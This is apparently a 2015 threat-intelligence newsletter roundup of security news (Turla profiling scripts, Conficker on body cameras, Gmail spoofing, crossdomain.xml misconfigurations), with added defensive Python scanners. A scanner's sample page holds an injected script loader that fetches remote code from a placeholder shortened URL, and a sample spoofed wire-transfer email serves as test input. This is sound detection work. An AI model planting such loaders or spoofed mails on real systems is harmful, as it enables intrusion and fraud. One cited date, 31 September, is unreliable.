The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.
Tuesday, 17 November 2015
ISLAMIC STATE IS PLANNING DEADLY CYBER ATTACKS
FROM THE MEDIA
According to UK Chancellor George Osborne, Islamic State militants are trying to develop the ability to execute attacks on UK infrastructure such as air traffic control and hospitals. Osborne noted that the Government Communications Headquarters is monitoring threats to 450 companies in energy, defense and water supply. Furthermore, he plans to double UK funding to fight cyber crime.
Read the Story: BBC
iSIGHT PARTNERS ANALYST COMMENT
While we still have not observed public acknowledgement from official ISIS representatives that the organization possesses a cyber capability, we believe that ISIS is conducting cyber threat activity on a limited basis. Targeting critical infrastructure assets would likely be of interest to ISIS, given the significant potential impact of a successful compromise; however, we have observed no evidence that ISIS cyber threat actors are capable of compromising critical infrastructure systems. It is possible that ISIS could develop such a capability if it elects to devote sufficient resources to do so.
RELATED iSIGHT PARTNERS REPORTS
15-00009824 (Pro-ISIS Hacktivism Overview), 16 Oct. 2015
15-00012766 (Hacktivist Reactions to Paris Terror Attacks Likely; Anonymous-Affiliated Actors Discuss Anti-ISIS Campaign #OpParis), 15 Nov. 2015
15-00011902 (Operational Net Assessment of Hacktivist Threats – July to September 2015), 26 Oct. 2015
STATE SPONSORED CYBER SPIES INJECT VICTIM PROFILING AND TRACKING SCRIPTS IN STRATEGIC WEBSITES
FROM THE MEDIA
FireEye researchers have discovered a campaign that injects tracking and profiling scripts into more than 100 websites visited by diplomats, academic researchers, government officials and business executives. Because the profiling scripts have not been used to deliver malware, the campaign's objective is likely to identify unique users for later targeting.
Read the Story: IT World
iSIGHT PARTNERS ANALYST COMMENT
This campaign corresponds to activity we reported in early 2015 that exemplified Turla Team's advanced profiling operations and high level of sophistication. In that reporting, we identified more than 100 sites related to diplomacy, the defense industrial base and media outlets in which injected JavaScript used Google-shortened URLs to redirect visitors to a profiling site, which placed a strongly persistent evercookie on redirected victims' machines to track targets of interest.
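As an added illustration (not code from iSIGHT or FireEye), the following Python scanner looks for the injection pattern described above: script or iframe references, inline or external, that point at a URL-shortener host. The sample page, the shortener list and the goo.gl path are constructed assumptions; the path is a placeholder, not a real short link.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: shortener hosts to flag. goo.gl is the one the campaign used;
# the others are plausible additions for a real deployment.
SHORTENER_HOSTS = {"goo.gl", "bit.ly", "tinyurl.com"}

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class ScriptCollector(HTMLParser):
    """Collect <script src>, <iframe src> and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.externals = []   # src attributes of <script> and <iframe>
        self.inline = []      # bodies of inline <script> elements
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            if attrs.get("src"):
                self.externals.append(attrs["src"])
            else:
                self._in_script = True
                self._buf = []
        elif tag == "iframe" and attrs.get("src"):
            self.externals.append(attrs["src"])

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def _is_shortener(url):
    host = (urlparse(url).hostname or "").lower()
    return host in SHORTENER_HOSTS


def find_shortener_refs(html_text):
    """Return (where, url) pairs for script/iframe content pointing at a shortener."""
    parser = ScriptCollector()
    parser.feed(html_text)
    parser.close()
    hits = [("external", src) for src in parser.externals if _is_shortener(src)]
    for body in parser.inline:
        hits.extend(("inline", url) for url in URL_RE.findall(body) if _is_shortener(url))
    return hits


# Constructed sample page: one legitimate script, one analytics snippet and one
# injected loader that pulls its next stage through a shortened URL.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>
  var img = new Image();
  img.src = "https://www.example-analytics.test/collect?p=" + location.pathname;
</script>
</head><body>
<h1>Ministry press releases</h1>
<script>var s=document.createElement('script');s.src='https://goo.gl/placeholder';document.body.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for where, url in find_shortener_refs(SAMPLE_HTML):
        print(f"{where}: {url}")
```

Run it against a saved copy of a suspect page; a hit in an inline loader that creates a second script element is the shape of injection the story describes, since the shortener hides the real profiling host from casual inspection.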
RELATED iSIGHT PARTNERS REPORTS
15-00000512 (Turla Team Uses Evercookies), 31 March 2015
15-00001032 (Turla Team Watering Hole Campaign), 9 March 2015
15-00009892 (Overview of Turla Team), 31 Sept. 2015
OLD-SCHOOL CONFICKER VIRUS TO INFECT POLICE BODY CAMS
FROM THE MEDIA
The Conficker worm has been discovered pre-installed on two Martel Electronics Frontline police body cameras. Researchers found the worm while testing the two devices; once the cameras were connected, it immediately began spreading to other machines in the test lab.
Read the Story: ZDNet
iSIGHT PARTNERS ANALYST COMMENT
This is not the first time Conficker has been observed spreading via portable devices that attach to PCs. In 2011, an Australian security organization reported that Conficker was installed on a device sold at an Aldi store in Australia. In that case, and in the current incident, the malware was likely introduced at some point in manufacturing via an infected machine used for production or testing. Organizations involved in manufacturing or development should take steps to ensure that their supply chain and production environments (including any systems used to image or test devices) are secure to avoid this type of incident, and where possible all organizations should test new hardware to ensure it has not been compromised prior to deployment.
RELATED iSIGHT PARTNERS REPORTS
Intel-442307 (Hard Drives from Australian Store Spreading Conficker Worm), 10 Aug. 2011
15-00003756 (Overview of Methods for Real-Time Control of Air-Gapped Systems), 8 May 2015
ThreatScape Media Highlights (Lenovo ThinkPad PCs Come With Pre-installed User Data Collection Software), 28 Sept. 2015
BUG IN GMAIL APP FOR ANDROID ALLOWS YOU TO SEND EMAILS PRETENDING TO BE SOMEONE ELSE
FROM THE MEDIA
A flaw in the Gmail app for Android allows a user to send e-mails that appear to come from someone else. The spoofing is enabled by altering e-mail headers: security researcher Yan Zhu discovered the flaw by changing her display name within the account settings, which changes how the sender appears to recipients. Google reportedly told the researcher that it does not consider the issue a security vulnerability.
Read the Story: Tech Worm
iSIGHT PARTNERS ANALYST COMMENT
We agree with Google that this Gmail app issue is not technically a security vulnerability. However, it can still be leveraged by attackers to perform email spoofing, which can be used to create more convincing spam or phishing campaigns. While this provides actors a new way to create spoofed emails, we are unaware of any reason that spoofed emails created using this method would pose any sort of unique threat beyond typical methods for creating spoofed emails.
RELATED iSIGHT PARTNERS REPORTS
15-00012060 (Potential Targeted Malware Infection Lures for November 2015), 29 Oct. 2015
15-00007560 (Russian-Speaking Actors Sell Job Site Databases; May Enable Multiple Types of eCrime Activities), 5 Aug. 2015
GMAIL TO SNITCH ON UNENCRYPTED MAIL SERVERS
FROM THE MEDIA
Google's Gmail will warn users when a message arrives over a plaintext, unencrypted connection. Google hopes to encourage providers to implement authentication and encryption for both inbound and outbound mail. The change follows a study by the Universities of Michigan and Illinois on how e-mail security has evolved since 2014.
Read the Story: IT News
iSIGHT PARTNERS ANALYST COMMENT
Google's plan to warn users when incoming emails are sent unencrypted comes against the backdrop of a larger effort by information and communications technology companies to ensure the widespread adoption of encrypted communications in order to boost overall security. While the notifications will not prevent malicious DNS servers from rerouting emails or nation states from tampering with STARTTLS negotiation on the wire, they should help raise public awareness and will likely encourage further adoption of encryption.
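The two Gmail items above (display-name spoofing and the unencrypted-transport warning) come down to the same thing on the receiving side: reading the headers. As an added example, not code from iSIGHT or Google, the Python below triages a raw message for a From display name that impersonates a different address and for whether the last hop (the topmost Received header, the one our own MX wrote) negotiated TLS. The two messages are constructed samples using documentation domains, the queue IDs are placeholders, and the decision that a trailing "S" in the RFC 3848 "with" keyword means TLS is the example's own rule.

```python
import re
from email import message_from_string
from email.utils import parseaddr

ADDR_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# RFC 3848 "with" keywords: ESMTPS, ESMTPSA, UTF8SMTPS... carry an S for TLS.
WITH_RE = re.compile(r"\bwith\s+((?:UTF8|E)?SMTP[SA]*)\b", re.IGNORECASE)
TLS_RE = re.compile(r"\bTLSv?\d", re.IGNORECASE)


def display_name_findings(msg):
    """Flag a From display name that shows an address other than the real one."""
    name, addr = parseaddr(msg.get("From", ""))
    findings = []
    shown = ADDR_RE.search(name)
    if shown and shown.group(0).lower() != addr.lower():
        findings.append(
            f"display name shows {shown.group(0)} but the actual From address is {addr}"
        )
    # Quotes or angle brackets surviving inside the name are a classic way to
    # push the real address out of view in a narrow mail client.
    if any(ch in name for ch in '"<>'):
        findings.append("display name contains quote or angle-bracket characters")
    return findings


def last_hop_encrypted(msg):
    """True/False for the most recent Received hop, None if there is none."""
    received = msg.get_all("Received") or []
    if not received:
        return None
    hop = str(received[0])  # topmost header = added by the receiving MX
    m = WITH_RE.search(hop)
    proto = m.group(1).upper() if m else ""
    return proto.rstrip("A").endswith("S") or bool(TLS_RE.search(hop))


def triage(raw_message):
    msg = message_from_string(raw_message)
    return {
        "display_name": display_name_findings(msg),
        "last_hop_encrypted": last_hop_encrypted(msg),
    }


# Constructed samples (not real traffic).
SPOOFED = """Received: from mail.attacker-relay.example (mail.attacker-relay.example [192.0.2.10])
    by mx.example.org with ESMTP id 1a2b3c
    for <victim@example.org>; Tue, 17 Nov 2015 10:00:00 +0000
From: "ceo@bigcorp.example" <throwaway@freemail.example>
To: victim@example.org
Subject: Urgent wire transfer

Please process the attached payment today.
"""

CLEAN = """Received: from mail.example.net (mail.example.net [192.0.2.20])
    (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256)
    by mx.example.org with ESMTPS id 4d5e6f
    for <victim@example.org>; Tue, 17 Nov 2015 10:05:00 +0000
From: Alice Example <alice@example.net>
To: victim@example.org
Subject: Lunch

Still on for noon?
"""

if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED), ("clean", CLEAN)):
        print(label, triage(raw))
```

The transport check only says whether the final hop used STARTTLS, which is exactly what Gmail's warning reports; it says nothing about earlier hops or about whether the certificate was validated, so treat it as a hygiene signal rather than proof of confidentiality.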
RELATED iSIGHT PARTNERS REPORTS
14-00000120 (Free Automated HTTPS Certificate Issuing Process ‘Let’s Encrypt’ Likely to Encrypt Malicious and Legitimate Web Traffic), 18 Dec. 2014
ThreatScape Media Highlights (Free of Charge SSL/TLS Certificates to be Available Next Month), 18 June 2015
10-10956 (Mozilla Firefox 3.6.6 SSL Common Name Wildcard Input Validation Vulnerability), 22 Jan. 2013
TEN-YEAR-OLD VULNERABILITY EXPOSES 6 PERCENT OF MOST POPULAR UK WEBSITES
FROM THE MEDIA
A ten-year-old vulnerability has been found on six percent of the 500 most visited UK websites. It could allow an attacker to acquire sensitive user credentials. The issue is an overly permissive crossdomain.xml policy file that allows Flash content loaded from any domain to make requests to the site. It has been found on sites belonging to financial services firms, healthcare providers and retailers.
Read the Story: SC Magazine
iSIGHT PARTNERS ANALYST COMMENT
Strictly speaking, a misconfiguration is not a vulnerability; however, attackers can still leverage misconfigured cross-domain policy files for malicious activity. While the full extent of websites susceptible to such attacks remains uncertain, we do not expect this issue to pose a significant threat in the long term. Only a small number of websites (30) have been identified running misconfigured files, and even if an attacker identified which websites are susceptible, the information they could access would depend on which users they trick into loading a specially crafted Flash file while logged in to the affected site. Therefore, unless the attacker is able to craft and deliver such files to targeted users, the attack may not be fruitful.
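As an added example (not from iSIGHT or the SC Magazine story), the following Python audit parses a crossdomain.xml policy and reports the permissive settings the story describes, shown against a hardened policy. Both policy files are constructed samples, and the finding texts and the severity judgements are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies (not taken from any site named in the story).
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>
"""

HARDENED_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="static.example.com" secure="true" />
</cross-domain-policy>
"""


def audit_policy(xml_text):
    """Return a list of findings; an empty list means nothing risky was seen."""
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return [f"unexpected root element <{root.tag}>"]
    findings = []

    site = root.find("site-control")
    if site is not None and site.get("permitted-cross-domain-policies") == "all":
        findings.append("site-control permits policy files from any path on the host")

    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            # Any SWF on the internet may issue requests with the visitor's
            # cookies and read the responses: the condition in the story.
            findings.append('allow-access-from domain="*" grants every origin')
        elif domain.startswith("*."):
            findings.append(f"allow-access-from trusts every subdomain of {domain[2:]}")
        # Adobe's default for secure is true on HTTPS policies; an explicit
        # "false" lets http:// content read https:// responses.
        if el.get("secure", "true").lower() == "false":
            findings.append(f'secure="false" on {domain or "<unspecified>"}')

    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append("any origin may send custom request headers")
    return findings


def allows_any_origin(xml_text):
    """Shortcut for the single worst case: a bare wildcard domain."""
    return any("every origin" in f for f in audit_policy(xml_text))


if __name__ == "__main__":
    for label, policy in (("permissive", PERMISSIVE_POLICY), ("hardened", HARDENED_POLICY)):
        print(label, audit_policy(policy) or "ok")
```

Point it at `https://<site>/crossdomain.xml` fetched over HTTPS (the file only matters at the web root or paths named by site-control), and remember that a wildcard is only dangerous where the site keeps authenticated sessions in cookies; a static content host can legitimately use it.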
RELATED iSIGHT PARTNERS REPORTS
15-00012792 (Weekly Vulnerability Exploitation Report), 16 Nov. 2015
Intel-1346271 (Cyber Espionage Operators Breached Anthem, Inc. in Long Running Campaign), 6 Nov. 2015
The post ThreatScape Media Highlights Update – Week Of November 17th appeared first on iSIGHT Partners.